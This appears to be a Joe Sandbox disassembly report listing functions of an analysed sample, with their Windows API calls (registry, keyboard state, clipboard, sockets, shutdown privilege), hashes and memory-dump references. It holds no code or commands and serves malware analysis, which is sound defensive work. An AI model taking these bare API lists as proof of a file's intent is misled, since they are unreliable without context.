                                                                            • String ID: \*.*$p1v`Kv
                                                                            • API String ID: 2643075503-760996285
                                                                            • Opcode ID: 03ec9df53a01cebb994a746a57190c7316fe4b599a647888693813104e69932d
                                                                            • Instruction ID: 6377947e90764436069f2f9dc6a07f416d1f83aa900bca5edabd5642f744fd38
                                                                            • Opcode Fuzzy Hash: 03ec9df53a01cebb994a746a57190c7316fe4b599a647888693813104e69932d
                                                                            • Instruction Fuzzy Hash: 553184B24083949EC722EFA48889DDBB7DCAF56310F44096EF5D8CB142EA35E50D8767
                                                                            Function 003631BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00363C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00362BB5,?,?), ref: 00363C1D
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0036328E
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0036332D
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003633C5
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00363604
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00363611
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: ddbb2f53c5f22559ef632005b28159ae9ed0405fe08f48413299153c885539d3
                                                                            • Instruction ID: ebb94dd3f07c03d201a4d7611b95a759dbb66bafc9cc8aacc3a8e70e7242d643
                                                                            • Opcode Fuzzy Hash: ddbb2f53c5f22559ef632005b28159ae9ed0405fe08f48413299153c885539d3
                                                                            • Instruction Fuzzy Hash: ADE16C75605200AFCB16DF29C891E6ABBE8EF89310F04C96DF54ADB2A1DB30ED05CB51
                                                                            Function 00342B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 00342B5F
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00342BE0
                                                                            • GetKeyState.USER32(000000A0), ref: 00342BFB
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00342C15
                                                                            • GetKeyState.USER32(000000A1), ref: 00342C2A
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00342C42
                                                                            • GetKeyState.USER32(00000011), ref: 00342C54
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00342C6C
                                                                            • GetKeyState.USER32(00000012), ref: 00342C7E
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00342C96
                                                                            • GetKeyState.USER32(0000005B), ref: 00342CA8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 4690662bc319c47eba1cbe117957ce48ff88f9c2fda7e181c999057b12dfe271
                                                                            • Instruction ID: 4e09b2b29df4d9cd8b941862ac8908df3113e28862585b0c70667c2fd885df7e
                                                                            • Opcode Fuzzy Hash: 4690662bc319c47eba1cbe117957ce48ff88f9c2fda7e181c999057b12dfe271
                                                                            • Instruction Fuzzy Hash: D441D6305047C96DFF339B6088443ABBFE0AB11354F85409AF9C66E2C2DB94ADC4C7A2
                                                                            Function 00356D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: d7ff8757c5016e36f7d32dbbffa4a66d9329db4f339c51a4a4d57ca9880b3545
                                                                            • Instruction ID: b1f273b455562df7936a961efcb53c57197a35e2593841a85b8d0c5028d5bc80
                                                                            • Opcode Fuzzy Hash: d7ff8757c5016e36f7d32dbbffa4a66d9329db4f339c51a4a4d57ca9880b3545
                                                                            • Instruction Fuzzy Hash: 85217A31300214AFDB12AF64DC4AF6E77E9EF48711F41885AF94ADB2A1DB34EC008B94
                                                                            Function 0035C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00339ABF: CLSIDFromProgID.OLE32 ref: 00339ADC
                                                                              • Part of subcall function 00339ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00339AF7
                                                                              • Part of subcall function 00339ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00339B05
                                                                              • Part of subcall function 00339ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00339B15
                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0035C235
                                                                            • _memset.LIBCMT ref: 0035C242
                                                                            • _memset.LIBCMT ref: 0035C360
                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0035C38C
                                                                            • CoTaskMemFree.OLE32(?), ref: 0035C397
                                                                            Strings
                                                                            • NULL Pointer assignment, xrefs: 0035C3E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1300414916-2785691316
                                                                            • Opcode ID: 06bd9369457699b2073a1b146fc680c20bc0ccb40bf10603f668f6a7df9d8a30
                                                                            • Instruction ID: 962c891c7d52540431fa0cce6db9adb45db224f02fd0494e5d47bb45b23574cd
                                                                            • Opcode Fuzzy Hash: 06bd9369457699b2073a1b146fc680c20bc0ccb40bf10603f668f6a7df9d8a30
                                                                            • Instruction Fuzzy Hash: 90914C71D01218AFDB12DF95DC91EDEBBB8EF08710F10815AF915AB291DB709A49CFA0
                                                                            Function 003479D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0033B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0033B180
                                                                              • Part of subcall function 0033B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0033B1AD
                                                                              • Part of subcall function 0033B134: GetLastError.KERNEL32 ref: 0033B1BA
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00347A0F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: fe4c08bba2adafc544b5ba0ddc92406f971df734a95542879272999ed5f99d4f
                                                                            • Instruction ID: b83448aa3d6ae099e901e09cd7b80b5e32282fea489fcd38de54b0ac970be569
                                                                            • Opcode Fuzzy Hash: fe4c08bba2adafc544b5ba0ddc92406f971df734a95542879272999ed5f99d4f
                                                                            • Instruction Fuzzy Hash: 8101A7716583116AF72B6664DC9ABBF73DC9B00740F150824FD43EA2D2D760BE0082B1
                                                                            Function 00358C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00358CA8
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358CB7
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00358CD3
                                                                            • listen.WSOCK32(00000000,00000005), ref: 00358CE2
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00358CFC
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00358D10
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                            • String ID:
                                                                            • API String ID: 1279440585-0
                                                                            • Opcode ID: 45eafc9af5a84ba01a6fd2a8210a79b54624f621ee2f1f893284e73bbd4af782
                                                                            • Instruction ID: 6b85e447004251822ebb90088e9db36c1589b299a6acfbcfaa665675f8198f59
                                                                            • Opcode Fuzzy Hash: 45eafc9af5a84ba01a6fd2a8210a79b54624f621ee2f1f893284e73bbd4af782
                                                                            • Instruction Fuzzy Hash: 3A21BF316002009FCB12EF68C985F6EB7E9EF48721F118598F956BB3E2CB30AD458B51
                                                                            Function 00346532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00346554
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00346564
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00346583
                                                                            • __wsplitpath.LIBCMT ref: 003465A7
                                                                            • _wcscat.LIBCMT ref: 003465BA
                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003465F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                            • String ID:
                                                                            • API String ID: 1605983538-0
                                                                            • Opcode ID: 045622432e6f12531e48a3fcd993d44db92fd146cdfa0e9042d427f9b897baa4
                                                                            • Instruction ID: 535f4a21c575c3a9874c90c270bd5bc9e7dd37817914538af34c80f722d431c3
                                                                            • Opcode Fuzzy Hash: 045622432e6f12531e48a3fcd993d44db92fd146cdfa0e9042d427f9b897baa4
                                                                            • Instruction Fuzzy Hash: 5E216571900218ABDB12AFA4DD89FEDB7FCAB46300F5004E5E505EB141D771AF85CB61
                                                                            Function 00309B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$:
                                                                            • API String ID: 0-1507734059
                                                                            • Opcode ID: 668c401303405b6fe8d5c48e0979a3fb41938fc629f17c30baa790649d75e2ce
                                                                            • Instruction ID: c11e7245f315e88e59c59c9e32b9615d795e7d7ce8cdc5d2775645d3a30165c2
                                                                            • Opcode Fuzzy Hash: 668c401303405b6fe8d5c48e0979a3fb41938fc629f17c30baa790649d75e2ce
                                                                            • Instruction Fuzzy Hash: 3C92CF71E0131ACBDF26DF58C8A07ADB7B5BB54310F2581AAE816AB2C1D7709D81CF91
                                                                            Function 003413CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 003413DC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($,2;$<2;$|
                                                                            • API String ID: 1659193697-982277254
                                                                            • Opcode ID: 8f4e7ff6f97682f46fb24785dfef7fd92b071c677612e50fc93e6b5f1fb2ad28
                                                                            • Instruction ID: e264b93d2b82149ece72d103157e5d41a2a8473c1a29ae27307e9868fdc4b68b
                                                                            • Opcode Fuzzy Hash: 8f4e7ff6f97682f46fb24785dfef7fd92b071c677612e50fc93e6b5f1fb2ad28
                                                                            • Instruction Fuzzy Hash: AD320775A00B059FC729CF69C4809AAB7F0FF48310B16C56EE59ADB7A1E770E981CB44
                                                                            Function 0035923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0035A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0035A84E
                                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00359296
                                                                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 003592B9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 4170576061-0
                                                                            • Opcode ID: 115face81eab991fd4b5783cae0852185662e62d9d6ff22c188d14dbd30481b7
                                                                            • Instruction ID: 109be7cf22756a20166bec469b912dca1556e836b842d6d3665de9b3a8463b8d
                                                                            • Opcode Fuzzy Hash: 115face81eab991fd4b5783cae0852185662e62d9d6ff22c188d14dbd30481b7
                                                                            • Instruction Fuzzy Hash: 8141E170600204AFDB16AF28C852FBE77EDEF48724F048549FA56AF2D2CB749D418B91
                                                                            Function 0034EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0034EB8A
                                                                            • _wcscmp.LIBCMT ref: 0034EBBA
                                                                            • _wcscmp.LIBCMT ref: 0034EBCF
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0034EBE0
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0034EC0E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: e0c8bdbfada214f930d61562041c29d313ff5d45a4497fbe42175ac71a3627e5
                                                                            • Instruction ID: 8e58bc4a431f88f8076c647bef37ddb9ff733519fb79513d82fffcba5eeb1d5e
                                                                            • Opcode Fuzzy Hash: e0c8bdbfada214f930d61562041c29d313ff5d45a4497fbe42175ac71a3627e5
                                                                            • Instruction Fuzzy Hash: 65418C356047029FC71ADF28C491A9AB7E8FF49324F10455DE95A8F3A1DB31BD84CB91
                                                                            Function 00368111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: 2c221d09a90489fd4946940149bbf667b35e262e5047329e6a49255c08abd064
                                                                            • Instruction ID: 6dd515f38deadf358053af85958c2c6808339907970276b09c61000f6ff9af29
                                                                            • Opcode Fuzzy Hash: 2c221d09a90489fd4946940149bbf667b35e262e5047329e6a49255c08abd064
                                                                            • Instruction Fuzzy Hash: 9711B2313016146FE7236F26DC44A6F779DEF5A760F058529F849D7281DF30A94287A4
                                                                            Function 0031E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0031E014,76E20AE0,0031DEF1,0039DC38,?,?), ref: 0031E02C
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0031E03E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 4fc7e551f6e9ce1ce1d97de3efc4cf4e2fff67cc5d8f4968fee6f0f2153bfe83
                                                                            • Instruction ID: 5754994b621282c7db3de772ae3ed04d69fdb515b0b920a5e21e1b7911ef6524
                                                                            • Opcode Fuzzy Hash: 4fc7e551f6e9ce1ce1d97de3efc4cf4e2fff67cc5d8f4968fee6f0f2153bfe83
                                                                            • Instruction Fuzzy Hash: 2AD0A7318007129FC7375F62EC0C6D377D8AF08704F194459E882D2590D7B4D8C08750
                                                                            Function 00313B70 Relevance: 5.9, Strings: 4, Instructions: 903COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                            • String ID: @$ <$ <$ <
                                                                            • API String ID: 3728558374-954184809
                                                                            • Opcode ID: c08b2ae72663e16ff5daea55650e8456324c594010358c83a126f18ae311e80b
                                                                            • Instruction ID: c08f555c6a1f96a385c60be207f5569c79ab2d9329fec24e3f1914c5f5932ddd
                                                                            • Opcode Fuzzy Hash: c08b2ae72663e16ff5daea55650e8456324c594010358c83a126f18ae311e80b
                                                                            • Instruction Fuzzy Hash: FF72B075D042089FCF2ADF94C881AEEB7B5EF4C300F15C059E919AB251D735AE86CB91
                                                                            Function 0031B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0031B22F
                                                                              • Part of subcall function 0031B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0031B5A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Proc$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 2749884682-0
                                                                            • Opcode ID: 0f339be3355f279d6a1fca456e0aec9138eb004b0ef28a1a4ab2595238377a47
                                                                            • Instruction ID: 37f1c4f0c5b477ff76d0a88df98fd61df4cf42ce47847290afe412df2c6c193d
                                                                            • Opcode Fuzzy Hash: 0f339be3355f279d6a1fca456e0aec9138eb004b0ef28a1a4ab2595238377a47
